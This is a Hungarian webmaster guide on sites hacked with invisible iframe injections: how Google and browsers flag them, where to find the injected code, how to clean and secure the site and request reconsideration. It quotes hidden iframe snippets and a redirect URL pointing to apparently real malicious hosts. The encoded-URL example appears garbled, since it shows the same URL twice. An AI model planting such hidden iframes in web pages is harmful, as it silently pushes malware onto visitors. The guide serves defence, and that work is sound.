Manapság gyakran „törnek fel” úgy weboldalakat, hogy tulajdonosuk számára sokáig észrevétlen marad. Az oldalgazdák sokszor csak akkor értesülnek minderről, ha a Google kereső „Az oldal káros lehet számítógéped számára” figyelmeztetést, vagy böngészőjük „Bejelentett támadó webhely” figyelmeztetést jelenít meg.
A Google számára adatot gyűjtő keresőrobotok a weboldalak tetemes hányadát bejárják, letöltik és elemzik, eközben vizsgálják a weblapok tartalmát, hogy nem próbálnak-e észrevétlenül valamilyen ismert, káros fájlt letöltetni a látogatókkal.
Ha netalán ilyen weblapot találnak webhelyünkön, akkor két problémánk lesz: oldalunk a Google keresőben pusztán korlátozottan, a modern böngészőkben pedig egyáltalán nem fog megjelenni:
- A Google kereső ugyanis „Az oldal káros lehet számítógéped számára” figyelmeztetést fogja megjeleníteni
- A modern böngészők pedig a Google segítségével „Bejelentett támadó webhely” figyelmeztetést jelenítenek meg.
Mindez természetesen látogatottságunk csökkenésével fog járni, tehát ha a látogatottsági statisztikánkban hirtelen zuhanást érzékelünk, akkor érdemes megvizsgálni, hogy nem „fertőzött”-e webhelyünk.
Technikai megvalósítás
Weboldalunkat feltörő illetéktelenek nem tesznek egyebet, minthogy beszúrnak a meglévő weblapok kódjába egy olyan linket, egyébként a látogatók számára láthatatlan, mely által az összes látogató, aki megtekinti a weboldalt, letölt egy olyan programot, mely kárt okozhat számítógépében.
Legtöbbször egy iframe elemet szúrnak bele a weboldal kódjába, amit többféleképpen próbálhatnak láthatatlanná tenni, vagy a width és height paraméterek 1-re vagy 0-ra vételével, vagy pedig valamilyen CSS paraméterrel, mint pl. style=”visibility:hidden”, style=”display:none”.
<iframe src="http://b1a.ru:8080/index.php" width=142 height=172 style="visibility: hidden"></iframe> <IFRAME SRC="http://shopmovielife.cn:8080/index.php" STYLE="visibility: hidden;" HEIGHT="189" WIDTH="147"></iframe>
A hivatkozott URL-t kódolhatják akár URL encoding segítségével, akár pedig hexadecimális számokkal meghatározott HTML entitás felhasználásával például a következőhöz hasonló kóddal, amit pedig egy JavaScript segítségével feloldanak. (ami egyébként helytelen, mert nincsenek pontosvesszők az entitások végén):
http://razorstudio.org/advtds/out.php?s_id=1
mindez a legtöbb böngészőben az alábbi módon jelenik meg:
http://razorstudio.org/advtds/out.php?s_id=1
Mi a teendő?
- keressük meg és távolítsuk el a kérdéses kódot a weblapokról
- előzzük meg az oldal „újrafertőződését”
- jelentsük be az oldal megtisztítását a Google Webmaster Tools oldalon.
Káros kód megkeresése
- A weblapok kódjában legtöbbször a <body> elem után vagy a </body> elem előtt közvetlenül fordul elő a hackerek által beszúrt kód.
- Ha ott nem látnánk gyanús elemeket, akkor abból kell kiindulni, hogy a weblapunk letöltésekor egy másik szerverről töltetnének le velünk egy fájlt, ez pedig csakis úgy lehet, hogy valahol szerepel a másik, „fertőzést terjesztő” szerver címe, amiben pedig biztos benne lesz a http:// karakterlánc.
- Ha a weblap kódjában a http:// -re keresve semmi gyanúsat nem észlelünk, akkor keressünk rá a javascript kifejezésre, és kutassunk a fent leírt gyanús kódolások után.
Az „újrafertőződés” megelőzése
Elméletben a webtárhelyünkhöz vagy a szerver feltörésével, vagy pedig az általunk használt számítógép és programok biztonsági hibáit kiaknázva férhetnek hozzá webhelyünkhöz. Ennek megfelelően cselekedjünk, hogy ez többé ne fordulhasson elő:
- változtassuk meg a hozzáférés jelszavait
- ha saját a szerver, akkor frissítsük a szerveren használt programokat
- ha bérelt tárhelyünk van, akkor értesítsük a tárhely üzemeltetőjét
- futtassunk vírusellenőrzést az általunk használt gépen
Az oldal megtisztításának bejelentése
Miután regisztráltunk a Google Webmestereszközök szolgáltatására és felvettük ellenőrzött webhelyünkként a problémás oldalt, kérjük a webhely újrafelvételét itt: https://www.google.com/webmasters/tools/reconsideration?hl=hu
Ha eddig még nem regisztráltunk a Webmaster Tools-ra, akkor érdemes megfontolni a regisztrációt a gyorsabb ügyintézés reményében. Ha mégsem szeretnénk regisztrálni, akkor kérhetjük az oldal felülvizsgálatát a http://stopbadware.org/home/review címen is.
Mennyi idő telik el, míg újra „tisztának” minősül az oldal?
Általában pár órától pár hétig terjedő időszak alatt kerül le a weboldal a bejelentett támadó webhelyek listájáról. Ha mégsem történik ezidő alatt változás, akkor
- Ellenőrizzük újra, hogy tényleg minden weblapról eltávolítottuk-e a kérdéses ártalmas kódot
- Végezzünk linképítést, hiszen ez a késedelmet lehet, hogy az okozza, hogy weboldalunk kevéssé tűnik fontosnak a keresők számára, és ezért csak nagy ritkán látogatják meg a keresőrobotok, így nem szereznek tudomást a változásokról.
További olvasnivaló